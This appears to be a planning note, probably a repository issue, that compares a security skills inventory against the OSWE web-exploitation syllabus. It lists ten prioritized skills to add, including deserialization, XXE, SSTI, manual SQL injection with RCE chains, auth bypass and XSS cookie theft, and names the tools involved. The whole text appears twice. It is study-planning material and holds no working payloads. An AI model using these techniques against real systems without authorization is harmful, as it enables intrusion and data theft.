Overview
Cross-referencing the existing skills inventory against the snoopysecurity/OSWE-Prep guide (AWAE/OSWE certification syllabus) reveals significant gaps in white-box web application exploitation coverage. The following skills are missing and block end-to-end mastery of OSWE exam topics.
Gap Analysis
Existing web/appsec coverage:
dast-zap, dast-nuclei, dast-ffuf, sast-semgrep, sast-bandit, api-mitmproxy, api-spectral, sca-blackduck, webapp-sqlmap (automated only)
Not covered: manual exploitation chains, deserialization, XXE, SSTI, file upload bypass, source code review methodology, Burp Suite advanced usage, auth bypass, advanced XSS chaining.
Priority Skill List
P0 — Core OSWE Exam Skills (Blockers)
1. appsec/proxy-burpsuite
The primary tool for OSWE. Must cover: intercepting proxy, Intruder (cluster bomb, pitchfork), Repeater, active/passive scanning, custom extensions (Turbo Intruder, Auth Analyzer), match-and-replace rules, session handling, macro recording.
- Frameworks: OWASP, CWE-200
- OSWE relevance: used in every single exam challenge
2. appsec/codereview-webapp
White-box source code review methodology — the core skill differentiating OSWE from black-box certs. Must cover: taint analysis workflows for PHP/Java/.NET/Node.js, dangerous function mapping (eval, unserialize, Runtime.exec, Process.Start), data-flow tracing from source to sink, grep patterns for common vulnerability classes, IDE setup (VSCodium + CodeQL), building a mental model of an unfamiliar codebase.
- Frameworks: OWASP Code Review Guide v2, CWE-20, CWE-116
- OSWE relevance: every challenge is white-box
P1 — Major Vulnerability Classes
3. appsec/exploit-deserialization
Deserialization exploitation across all OSWE-targeted languages. Must cover: Java (ysoserial, gadget chains, SerializationDumper), PHP (phpggc, __wakeup/__destruct chain construction, PHAR deserialization), .NET (ysoserial.net, ViewState attacks, JSON.NET gadgets), Node.js (node-serialize, prototype pollution). Include payload generation scripts per platform.
- Frameworks: CWE-502, OWASP A08:2021
- OSWE machines: Arkham (Java), Json (.NET), Celestial (Node), dev/random/pipe (PHP)
4. appsec/vuln-xxe
XXE injection testing and exploitation. Must cover: classic file read, blind XXE via OOB (DNS/HTTP callback), SSRF pivot via XXE, XXE-to-RCE via PHP expect://, SVG/XLSX/DOCX XXE vectors, XXE in SOAP/REST/XML APIs, entity expansion (billion laughs), WAF bypass techniques. Tooling: XXEinjector, manual payloads, GoSecure XXE workshop exercises.
- Frameworks: CWE-611, OWASP A05:2021
- OSWE relevance: dedicated OSWE module; XXE-Study lab
5. appsec/vuln-ssti
Server-Side Template Injection across all major engines. Must cover: detection methodology (polyglot payloads), engine fingerprinting decision tree, RCE payloads for Jinja2, Twig, Freemarker, Smarty, Velocity, Pebble, Mako. Tooling: SSTImap, tplmap. Include sandbox escape techniques and GoSecure SSTI workshop.
- Frameworks: CWE-94, OWASP A03:2021
- OSWE relevance: GoSecure Template Injection Workshop is listed prep material
P2 — Exploitation Chains & Bypass Techniques
6. appsec/vuln-fileupload
File upload bypass and exploitation. Must cover: extension bypass (double extension, null byte, MIME spoofing, content-type manipulation), .htaccess / web.config upload for execution context, zip slip / path traversal in archive extraction, image polyglot payloads, client-side validation bypass, ImageMagick/GhostScript delegation exploits. References: PayloadsAllTheThings upload section.
- Frameworks: CWE-434, OWASP A04:2021
- OSWE machines: Popcorn, Vault
7. appsec/vuln-authbypass
Authentication bypass techniques. Must cover: PHP type juggling (== vs ===, magic hash strings, strcmp() bypass), JWT attacks (none algorithm, weak secret brute-force with hashcat, algorithm confusion RS256→HS256), password reset logic flaws, race conditions in auth flows, horizontal/vertical authorization testing, account takeover chains. Script: jwt_tool.
- Frameworks: CWE-287, CWE-303, OWASP A07:2021
- OSWE machines: Cereal, Falafel; ATutor auth bypass writeup
8. appsec/vuln-sqli-manual
Manual SQL injection exploitation beyond sqlmap. Must cover: blind boolean-based (custom binary search scripts), time-based blind (MySQL SLEEP, MSSQL WAITFOR), stacked queries per DBMS, second-order / persistent SQLi, LOAD_FILE / INTO OUTFILE for file R/W, MSSQL xp_cmdshell RCE chain, PostgreSQL COPY TO/FROM PROGRAM RCE. Include Python exploit scripting patterns (requests + binary search).
- Frameworks: CWE-89, OWASP A03:2021
- OSWE machines: Unattended (MySQL), Fighter (MSSQL), Falafel (MySQL + type juggling)
9. appsec/vuln-xss
Advanced XSS exploitation chains. Must cover: XSS-to-account-takeover methodology, stored vs reflected payload placement, cookie theft with HttpOnly alternatives (JS keylogger, form hijack), CSP bypass techniques, DOM-based XSS sinks (innerHTML, eval, document.write), XSS combined with MySQL FILE (PentesterLab exercise), self-XSS escalation, BeEF framework basics.
- Frameworks: CWE-79, OWASP A03:2021
- OSWE relevance: PentesterLab "XSS and MySQL FILE" is listed prep lab
P3 — Supporting Exploitation Skills
10. offsec/exploit-pywebscript
Python exploit script development for web vulnerabilities. Must cover: building single-file exploit scripts with requests (session handling, CSRF token extraction, redirect following), pwntools for binary-adjacent web exploits, automating blind SQLi/blind XXE, scripting multi-step exploit chains (auth → upload → trigger), cookie/header manipulation, regex-based response parsing. References: HTB AWAE scripts repo, PortSwigger SQLi script collection, blindSQLir.
- Frameworks: MITRE ATT&CK T1190
- OSWE relevance: OSWE exam requires submitting a single working exploit script per challenge
Suggested Implementation Order
| # |
Skill |
Category |
Effort |
OSWE Weight |
| 1 |
proxy-burpsuite |
appsec |
High |
Critical |
| 2 |
codereview-webapp |
appsec |
High |
Critical |
| 3 |
exploit-deserialization |
appsec |
High |
High |
| 4 |
vuln-xxe |
appsec |
Medium |
High |
| 5 |
vuln-ssti |
appsec |
Medium |
High |
| 6 |
vuln-sqli-manual |
appsec |
Medium |
High |
| 7 |
vuln-authbypass |
appsec |
Medium |
Medium |
| 8 |
vuln-fileupload |
appsec |
Medium |
Medium |
| 9 |
vuln-xss |
appsec |
Medium |
Medium |
| 10 |
exploit-pywebscript |
offsec |
Low |
High |
Reference Sources
Overview
Cross-referencing the existing skills inventory against the snoopysecurity/OSWE-Prep guide (AWAE/OSWE certification syllabus) reveals significant gaps in white-box web application exploitation coverage. The following skills are missing and block end-to-end mastery of OSWE exam topics.
Gap Analysis
Existing web/appsec coverage:
dast-zap,dast-nuclei,dast-ffuf,sast-semgrep,sast-bandit,api-mitmproxy,api-spectral,sca-blackduck,webapp-sqlmap(automated only)Not covered: manual exploitation chains, deserialization, XXE, SSTI, file upload bypass, source code review methodology, Burp Suite advanced usage, auth bypass, advanced XSS chaining.
Priority Skill List
P0 — Core OSWE Exam Skills (Blockers)
1.
appsec/proxy-burpsuiteThe primary tool for OSWE. Must cover: intercepting proxy, Intruder (cluster bomb, pitchfork), Repeater, active/passive scanning, custom extensions (Turbo Intruder, Auth Analyzer), match-and-replace rules, session handling, macro recording.
2.
appsec/codereview-webappWhite-box source code review methodology — the core skill differentiating OSWE from black-box certs. Must cover: taint analysis workflows for PHP/Java/.NET/Node.js, dangerous function mapping (
eval,unserialize,Runtime.exec,Process.Start), data-flow tracing from source to sink, grep patterns for common vulnerability classes, IDE setup (VSCodium + CodeQL), building a mental model of an unfamiliar codebase.P1 — Major Vulnerability Classes
3.
appsec/exploit-deserializationDeserialization exploitation across all OSWE-targeted languages. Must cover: Java (
ysoserial, gadget chains,SerializationDumper), PHP (phpggc,__wakeup/__destructchain construction, PHAR deserialization), .NET (ysoserial.net, ViewState attacks, JSON.NET gadgets), Node.js (node-serialize, prototype pollution). Include payload generation scripts per platform.4.
appsec/vuln-xxeXXE injection testing and exploitation. Must cover: classic file read, blind XXE via OOB (DNS/HTTP callback), SSRF pivot via XXE, XXE-to-RCE via PHP
expect://, SVG/XLSX/DOCX XXE vectors, XXE in SOAP/REST/XML APIs, entity expansion (billion laughs), WAF bypass techniques. Tooling:XXEinjector, manual payloads, GoSecure XXE workshop exercises.5.
appsec/vuln-sstiServer-Side Template Injection across all major engines. Must cover: detection methodology (polyglot payloads), engine fingerprinting decision tree, RCE payloads for Jinja2, Twig, Freemarker, Smarty, Velocity, Pebble, Mako. Tooling:
SSTImap,tplmap. Include sandbox escape techniques and GoSecure SSTI workshop.P2 — Exploitation Chains & Bypass Techniques
6.
appsec/vuln-fileuploadFile upload bypass and exploitation. Must cover: extension bypass (double extension, null byte, MIME spoofing, content-type manipulation),
.htaccess/ web.config upload for execution context, zip slip / path traversal in archive extraction, image polyglot payloads, client-side validation bypass, ImageMagick/GhostScript delegation exploits. References: PayloadsAllTheThings upload section.7.
appsec/vuln-authbypassAuthentication bypass techniques. Must cover: PHP type juggling (
==vs===, magic hash strings,strcmp()bypass), JWT attacks (none algorithm, weak secret brute-force withhashcat, algorithm confusion RS256→HS256), password reset logic flaws, race conditions in auth flows, horizontal/vertical authorization testing, account takeover chains. Script:jwt_tool.8.
appsec/vuln-sqli-manualManual SQL injection exploitation beyond
sqlmap. Must cover: blind boolean-based (custom binary search scripts), time-based blind (MySQLSLEEP, MSSQLWAITFOR), stacked queries per DBMS, second-order / persistent SQLi,LOAD_FILE/INTO OUTFILEfor file R/W, MSSQLxp_cmdshellRCE chain, PostgreSQLCOPY TO/FROM PROGRAMRCE. Include Python exploit scripting patterns (requests+ binary search).9.
appsec/vuln-xssAdvanced XSS exploitation chains. Must cover: XSS-to-account-takeover methodology, stored vs reflected payload placement, cookie theft with
HttpOnlyalternatives (JS keylogger, form hijack), CSP bypass techniques, DOM-based XSS sinks (innerHTML,eval,document.write), XSS combined with MySQLFILE(PentesterLab exercise), self-XSS escalation, BeEF framework basics.P3 — Supporting Exploitation Skills
10.
offsec/exploit-pywebscriptPython exploit script development for web vulnerabilities. Must cover: building single-file exploit scripts with
requests(session handling, CSRF token extraction, redirect following),pwntoolsfor binary-adjacent web exploits, automating blind SQLi/blind XXE, scripting multi-step exploit chains (auth → upload → trigger), cookie/header manipulation, regex-based response parsing. References: HTB AWAE scripts repo, PortSwigger SQLi script collection,blindSQLir.Suggested Implementation Order
proxy-burpsuitecodereview-webappexploit-deserializationvuln-xxevuln-sstivuln-sqli-manualvuln-authbypassvuln-fileuploadvuln-xssexploit-pywebscriptReference Sources